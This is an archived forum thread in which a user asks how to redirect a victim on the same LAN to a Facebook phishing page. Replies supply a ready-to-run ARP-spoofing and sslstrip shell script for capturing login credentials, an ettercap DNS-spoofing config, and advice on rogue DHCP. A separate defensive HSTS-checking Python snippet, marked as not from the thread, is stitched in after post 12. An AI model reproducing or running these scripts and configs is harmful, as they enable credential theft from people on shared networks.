
Thread: MITM redirect only when browsing specific URL?

  1. #1
    Join Date
    2013-May
    Posts
    1

    MITM redirect only when browsing specific URL?

    Hello, when I have like my Facebook phisher on (se-toolkit) (victim on the same network)
    I want to be able to redirect the victim to the phisher when he visits the real Facebook.
    How could I do this? What would be even better is if, when the victim is redirected, the URL is still facebook.com.

    Thanks in advance.
    (I'm only going to test this on myself legally)

  2. #2
    Join Date
    2013-Apr
    Posts
    126
    You need to perform a DNS spoofing attack.

  3. #3
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    Why not use Subterfuge and run a rogue DHCP? You should get your password.
    Smile while you can, for in the future there may be nothing to smile about.
    I'm sorry, but this could not be translated.

  4. #4
    Join Date
    2013-Apr
    Posts
    126
    Quote Originally Posted by shaberu View Post
    Why not use Subterfuge and run a rogue DHCP? You should get your password.
    It depends; if the victim is using SSL it will not be possible to get the password...

  5. #5
    Join Date
    2013-Apr
    Posts
    32
    Try this; even on SSL it will capture the password.

    script:
    #!/bin/sh
    #Created by DG Consulting Uk for the easy automation of penetration Tasks
    #copyright 2011 DG Consulting Uk
    lanIP=`ifconfig | grep "inet addr" | awk '{print $2}' | cut -d":" -f2 | sed 's/127.0.0.1//g'`
    gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`

    echo Ssl-communications sniffer v2.0
    echo Written by DeeGee
    echo copyright 2011

    echo [!] Initializing ssl attax
    ################################################## ################################################## #####
    #cleanup script
    killall ettercap
    killall arpspoof
    echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
    iptables --flush # just to make sure
    iptables --table nat --flush # now everything's clean
    iptables --delete-chain
    iptables --table nat --delete-chain


    ################################################## ################################################## #####

    echo -n "Enter your interface and press [Enter]: "
    read -e interface

    echo -n "Enter the target IP and press [Enter]: "
    read -e target

    ################################################## ################################################## #####

    echo "Setting up ip_forwarding: "

    echo "1" > /proc/sys/net/ipv4/ip_forward

    echo "Setting up Ip tables rule: "

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    xterm -hold -e sslstrip -l 10000 &

    xterm -hold -e tail -f sslstrip.log &

    arpspoof -i $interface -t $target $gatewayIP

    ################################################## ################

    It will need a few changes on Kali but it works flawlessly on BT5 R2/3

    Run and fix the errors if any pop up (ie) xterm -hold -e ...............may need xterm -hold....

  6. #6
    Join Date
    2013-Apr
    Posts
    32
    Alternatively you could run a simple DNS redirect using etter.dns

    etter.dns:

    target-url.com A 192.168.0.13
    www.target-url.com A 192.168.0.13

    192.168.0.13 being your ip on the lan.

    This will need a phishing page which posts data to another file, and it's all HTTP instead of HTTPS.

    Kind Regards Dee

  7. #7
    Join Date
    2013-Apr
    Posts
    126
    Quote Originally Posted by pentest09 View Post
    Try this; even on SSL it will capture the password.

    This script implements the sslstrip attack; it does not work if the victim is using SSL by default. For example, if the victim tries to log in to his Gmail account: if he browses to http://gmail.com the attack will work, but if he browses to https://gmail.com it will not work.
    Last edited by root-boy; 2013-05-22 at 11:13.

  8. #8
    Join Date
    2013-Apr
    Posts
    126
    Quote Originally Posted by pentest09 View Post
    Alternatively you could run a simple DNS redirect using etter.dns

    etter.dns:

    target-url.com A 192.168.0.13
    www.target-url.com A 192.168.0.13

    192.168.0.13 being your ip on the lan.

    This will need a phishing page which posts data to another file, and it's all HTTP instead of HTTPS.

    Kind Regards Dee
    That's the DNS spoofing attack that I was talking about.

  9. #9
    Join Date
    2013-Apr
    Posts
    32
    Quote Originally Posted by root-boy View Post
    This script implements the sslstrip attack; it does not work if the victim is using SSL by default. For example, if the victim tries to log in to his Gmail account: if he browses to http://gmail.com the attack will work, but if he browses to https://gmail.com it will not work.
    No, if you log in to Facebook it's HTTPS; sslstrip captures the creds, same with Gmail or any other HTTPS site, but in the URL it will show http:

  10. #10
    Join Date
    2013-Apr
    Posts
    32
    Quote Originally Posted by root-boy View Post
    That's the DNS spoofing attack that I was talking about.
    Here's a vid I did a while ago; read the description for the HD version.
    http://blip.tv/dgconsultinguk/dns_sp...ntials-4517172
    Hope it helps..

  11. #11
    Join Date
    2013-Apr
    Posts
    126
    Quote Originally Posted by pentest09 View Post
    No, if you log in to Facebook it's HTTPS; sslstrip captures the creds, same with Gmail or any other HTTPS site, but in the URL it will show http:
    I'm not sure if you understood me correctly, but read this

  12. #12
    Join Date
    2013-Apr
    Posts
    126
    What I'm trying to explain is:

    When the victim uses HTTPS from the beginning, the attack will not work. For example, if the victim browses to http://gmail.com, fills in the form and clicks login, normally the victim will be redirected to https://gmail.com, but in this case sslstrip will force the credentials to be sent over HTTP, not HTTPS, and this is the role of sslstrip. However, if the victim browses to https://gmail.com and logs in, the attack will fail because it's already a secure connection.
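
The distinction drawn in this post (the attack needs at least one plain-HTTP request to intercept) is what HTTP Strict Transport Security addresses: a valid policy makes the browser rewrite http:// to https:// before anything reaches the network. An added example, not from the thread, that parses a `Strict-Transport-Security` header following RFC 6797 rules and reports when a site's visitors can still be served over plain HTTP; the function names, result labels and the `on_preload_list` input are assumptions of this sketch.

```python
import re

def parse_hsts(value):
    """Parse a Strict-Transport-Security value; return None if it is invalid."""
    if not value:
        return None
    seen = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        name = name.strip().lower()          # directive names are case-insensitive
        if name in seen:
            return None                      # a repeated directive invalidates the header
        seen[name] = arg.strip().strip('"')  # values may be quoted strings
    if not re.fullmatch(r"[0-9]+", seen.get("max-age", "")):
        return None                          # max-age is required and numeric
    return {"max_age": int(seen["max-age"]),
            "include_subdomains": "includesubdomains" in seen,
            "preload": "preload" in seen}

def stripping_exposure(hsts_header, on_preload_list=False):
    """Classify when a browser may still send this site a plain-HTTP request.

    hsts_header: header value seen on the site's HTTPS response (or None).
    on_preload_list: assumption supplied by the caller, i.e. whether the
    domain is shipped in browsers' built-in HSTS preload lists.
    """
    policy = parse_hsts(hsts_header)
    if policy is None or policy["max_age"] == 0:
        return "every-plain-http-visit"       # no policy, or policy removed
    if policy["preload"] and on_preload_list:
        return "no-plain-http-request"        # HTTPS enforced before first contact
    return "first-visit-or-after-expiry"      # policy learned only after one HTTPS visit

# Constructed header values for illustration.
SAMPLES = [
    (None, False),
    ("max-age=0", False),
    ("max-age=31536000; includeSubDomains", False),
    ("max-age=63072000; includeSubDomains; preload", True),
]

if __name__ == "__main__":
    for header, preloaded in SAMPLES:
        print(repr(header), "->", stripping_exposure(header, preloaded))
```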

  13. #13
    Join Date
    2013-Apr
    Posts
    32
    Gotcha! Sorry... that was one of the reasons I used a phisher method, because ESET blocked the attacks but the phisher method worked. Hope the vid helped.

  14. #14
    Join Date
    2013-Apr
    Posts
    126
    Yep thanks for the video man.
